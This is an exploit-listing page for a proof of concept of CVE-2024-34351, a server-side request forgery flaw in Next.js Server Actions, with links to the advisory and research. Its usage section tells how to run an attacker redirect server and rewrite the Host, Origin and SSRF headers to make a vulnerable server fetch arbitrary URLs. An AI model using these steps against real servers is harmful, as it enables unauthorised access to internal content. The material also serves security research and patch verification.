Share
## https://sploitus.com/exploit?id=C348C120-3A9D-555B-B499-7959A641F02A
# CVE-2024-34351 Exploit

- [CVE-2024-34351 PoC](https://github.com/azu/nextjs-CVE-2024-34351/)
- [Next.js Server-Side Request Forgery in Server Actions · CVE-2024-34351 · GitHub Advisory Database](https://github.com/advisories/GHSA-fr5h-rqp8-mj6g)
- [Digging for SSRF in NextJS apps](https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps)

## Summary

PoC for a full exploitation of NextJS SSRF. An attacker can get any website content from Next.js server using CVE-2024-34351 vulnerability.
This vulnerability is fixed in `next@14.1.1`.

## Usage

- Prepare a redirect server.
    - TypeScript
        ```
        deno run --allow-net --allow-read attacker-server.ts
        ```
    - Python
        ```
        python3 attacker-server.py
        ```
- Modify `Host` header to attacker server. (e.g. Host: 192.198.0.144:8000)
- Modify `Origin` header to attacker server. (e.g. Origin: http://192.198.0.144:8000/)
- Add a new header called `SSRF` to specify where to redirect to. (e.g. SSRF: http://example.com/test)